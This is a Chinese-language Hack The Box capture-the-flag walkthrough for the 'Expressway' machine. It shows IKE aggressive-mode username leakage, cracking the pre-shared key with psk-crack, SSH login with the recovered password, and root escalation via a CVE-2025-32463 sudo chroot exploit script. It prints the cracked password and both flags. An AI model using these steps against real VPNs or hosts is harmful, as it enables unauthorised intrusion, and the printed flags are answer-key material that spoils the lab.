[Season9] Expressway WP

Posted on 2025-09-22 Edited on 2025-10-01 Word count in article: 626 Reading time ≈ 2 mins.

Hack The Box [Season9] Expressway Linux Easy

信息收集

tcp 扫描发现只开放了 22 端口

1
2
3

root@cloudcone ~/workspace# rustscan -a $IP
Automatically increasing ulimit value to 1000.
Open 10.10.11.87:22

尝试扫描 udp，可以看到 500 端口是开着的

root@cloudcone ~/workspace# nmap -sU -Pn $IP
Nmap scan report for 10.10.11.87
Host is up (2.7s latency).
Not shown: 996 closed ports
PORT     STATE         SERVICE
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
500/udp  open          isakmp
4500/udp open|filtered nat-t-ike

500/udp - Pentesting IPsec/IKE VPN - HackTricks

使用 ike-scan 看到 Auth 为 PSK，使用 Aggressive mode 查询可以得到一个用户名 ike

root@cloudcone ~/workspace# ike-scan -M 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Main Mode Handshake returned
        HDR=(CKY-R=446bae038926673a)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Ending ike-scan 1.9.5: 1 hosts scanned in 1.845 seconds (0.54 hosts/sec).  1 returned handshake; 0 returned notify

root@cloudcone ~/workspace# ike-scan -A -M 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=4bbacd2a5016f7f6)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.680 seconds (1.47 hosts/sec).  1 returned handshake; 0 returned notify

爆破 psk hash

root@cloudcone ~/workspace# ike-scan -Phash.txt -A -M 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=373fa754bb77e682)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.153 seconds (6.53 hosts/sec).  1 returned handshake; 0 returned notify
root@cloudcone ~/workspace# psk-crack -d rockyou.txt hash.txt
Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash acf5072f0876729115ae3b2d42b1a27b2e84ef63
Ending psk-crack: 8045039 iterations in 16.306 seconds (493393.28 iterations/sec)

尝试使用 ssh 登录 ike:freakingrockstarontheroad 得到 user flag

root@cloudcone ~/workspace [SIGINT]# ssh ike@$IP
ike@10.10.11.87's password: 
Last login: Wed Sep 17 10:26:26 BST 2025 from 10.10.14.77 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 22 08:49:37 2025 from 10.10.16.17
ike@expressway:~$ cat user.txt 
24db6a7ba04d31d042da08cfcebb1517

sudo 版本受 pr0v3rbs/CVE-2025-32463_chwoot: Escalation of Privilege to the root through sudo binary with chroot option. CVE-2025-32463 影响

ike@expressway:~$ sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17

ike@expressway:~$ sudo -R woot woot
sudo: woot: No such file or directory

利用进行提权

ike@expressway:~$ chmod +x sudo-chwoot.sh 
ike@expressway:~$ ./sudo-chwoot.sh 
woot!        
root@expressway:/# cat /root/root.txt 
b52dbb542ec88b60a5713de6eb159d2d